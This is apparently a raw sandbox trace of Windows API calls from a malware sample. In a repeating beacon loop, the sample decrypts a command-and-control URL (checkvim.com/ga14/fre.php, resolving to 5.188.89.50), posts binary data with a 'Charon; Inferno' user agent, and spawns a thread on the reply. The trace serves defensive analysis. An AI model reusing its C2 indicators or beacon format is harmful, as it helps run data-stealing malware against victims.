0x870228 [0221.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.694] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0221.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.695] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0221.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.696] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0221.696] GetProcessHeap () returned 0x840000 [0221.696] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0221.696] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0221.703] GetProcessHeap () returned 0x840000 [0221.703] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0221.703] socket (af=2, type=1, protocol=6) returned 0x2d0 [0221.703] connect (s=0x2d0, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0221.775] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0221.775] GetProcessHeap () returned 0x840000 [0221.775] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0221.775] GetProcessHeap () returned 0x840000 [0221.775] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0221.776] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0221.777] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0221.777] GetProcessHeap () returned 0x840000 [0221.777] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0221.777] GetProcessHeap () returned 0x840000 [0221.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0221.777] GetProcessHeap () returned 0x840000 [0221.777] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0221.777] GetProcessHeap () returned 0x840000 [0221.777] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0221.778] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0221.778] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0221.779] GetProcessHeap () returned 0x840000 [0221.779] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0221.779] GetProcessHeap () returned 0x840000 [0221.779] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0221.779] send (s=0x2d0, buf=0x873a58*, len=237, flags=0) returned 237 [0221.779] send (s=0x2d0, buf=0x87eb58*, len=159, flags=0) returned 159 [0221.780] GetProcessHeap () returned 0x840000 [0221.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0221.780] recv (in: s=0x2d0, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0222.125] GetProcessHeap () returned 0x840000 [0222.125] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0222.125] GetProcessHeap () returned 0x840000 [0222.125] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0222.125] GetProcessHeap () returned 0x840000 [0222.125] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0222.125] GetProcessHeap () returned 0x840000 [0222.125] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0222.125] closesocket (s=0x2d0) returned 0 [0222.126] GetProcessHeap () returned 0x840000 [0222.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0222.126] GetProcessHeap () returned 0x840000 [0222.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0222.126] GetProcessHeap () returned 0x840000 [0222.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0222.126] GetProcessHeap () returned 0x840000 [0222.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0222.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x12a4) returned 0x2d0 [0222.127] Sleep (dwMilliseconds=0xea60) [0222.129] GetProcessHeap () returned 0x840000 [0222.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0222.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.130] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0222.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.136] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0222.142] GetProcessHeap () returned 0x840000 [0222.142] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0222.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.143] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0222.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.144] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0222.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.145] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.145] GetProcessHeap () returned 0x840000 [0222.145] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0222.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.145] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0222.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.146] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0222.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.147] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0222.147] GetProcessHeap () returned 0x840000 [0222.147] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0222.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.149] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.149] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.150] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.151] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.151] GetProcessHeap () returned 0x840000 [0222.151] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0222.151] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0222.152] GetProcessHeap () returned 0x840000 [0222.152] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0222.152] GetProcessHeap () returned 0x840000 [0222.152] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0222.152] GetProcessHeap () returned 0x840000 [0222.152] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0222.152] GetProcessHeap () returned 0x840000 [0222.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0222.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.153] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0222.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.158] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0222.164] GetProcessHeap () returned 0x840000 [0222.164] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0222.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.165] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0222.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.165] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0222.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.166] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.166] GetProcessHeap () returned 0x840000 [0222.166] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0222.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.167] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0222.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.168] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0222.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.169] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0222.169] GetProcessHeap () returned 0x840000 [0222.169] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0222.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.170] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0222.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.171] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0222.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.172] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0222.172] GetProcessHeap () returned 0x840000 [0222.172] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0222.172] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0222.173] GetProcessHeap () returned 0x840000 [0222.173] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0222.173] socket (af=2, type=1, protocol=6) returned 0x2d4 [0222.174] connect (s=0x2d4, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0222.246] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0222.246] GetProcessHeap () returned 0x840000 [0222.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0222.246] GetProcessHeap () returned 0x840000 [0222.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0222.247] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0222.248] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0222.248] GetProcessHeap () returned 0x840000 [0222.248] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0222.248] GetProcessHeap () returned 0x840000 [0222.248] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0222.248] GetProcessHeap () returned 0x840000 [0222.248] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0222.248] GetProcessHeap () returned 0x840000 [0222.248] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0222.248] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0222.249] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0222.249] GetProcessHeap () returned 0x840000 [0222.249] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0222.249] GetProcessHeap () returned 0x840000 [0222.249] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0222.249] send (s=0x2d4, buf=0x873a58*, len=237, flags=0) returned 237 [0222.250] send (s=0x2d4, buf=0x87eb58*, len=159, flags=0) returned 159 [0222.250] GetProcessHeap () returned 0x840000 [0222.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0222.250] recv (in: s=0x2d4, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0222.635] GetProcessHeap () returned 0x840000 [0222.636] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0222.636] GetProcessHeap () returned 0x840000 [0222.636] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0222.636] GetProcessHeap () returned 0x840000 [0222.636] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0222.636] GetProcessHeap () returned 0x840000 [0222.636] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0222.636] closesocket (s=0x2d4) returned 0 [0222.636] GetProcessHeap () returned 0x840000 [0222.636] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0222.636] GetProcessHeap () returned 0x840000 [0222.637] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0222.637] GetProcessHeap () returned 0x840000 [0222.637] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0222.637] GetProcessHeap () returned 0x840000 [0222.637] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0222.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xdd4) returned 0x2d4 [0222.639] Sleep (dwMilliseconds=0xea60) [0222.656] GetProcessHeap () returned 0x840000 [0222.656] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0222.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.658] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0222.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.667] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0222.675] GetProcessHeap () returned 0x840000 [0222.675] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0222.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.681] CryptImportKey (in: hProv=0x86fb50, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0222.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.682] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0222.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.683] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.683] GetProcessHeap () returned 0x840000 [0222.683] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0222.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.684] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0222.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.686] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0222.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.687] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0222.687] GetProcessHeap () returned 0x840000 [0222.687] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0222.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.689] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.690] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.691] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.692] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.693] GetProcessHeap () returned 0x840000 [0222.693] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0222.693] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0222.693] GetProcessHeap () returned 0x840000 [0222.693] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0222.693] GetProcessHeap () returned 0x840000 [0222.693] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0222.693] GetProcessHeap () returned 0x840000 [0222.693] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0222.693] GetProcessHeap () returned 0x840000 [0222.693] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0222.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.695] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0222.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.702] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0222.710] GetProcessHeap () returned 0x840000 [0222.710] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0222.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.711] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0222.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.712] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0222.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.714] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.714] GetProcessHeap () returned 0x840000 [0222.714] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0222.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.715] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0222.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.716] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0222.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0222.717] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0222.717] GetProcessHeap () returned 0x840000 [0222.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0222.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.719] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0222.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.720] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0222.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.722] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0222.722] GetProcessHeap () returned 0x840000 [0222.722] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871240 [0222.722] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0222.723] GetProcessHeap () returned 0x840000 [0222.723] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0222.724] socket (af=2, type=1, protocol=6) returned 0x2d8 [0222.724] connect (s=0x2d8, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0222.797] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0222.797] 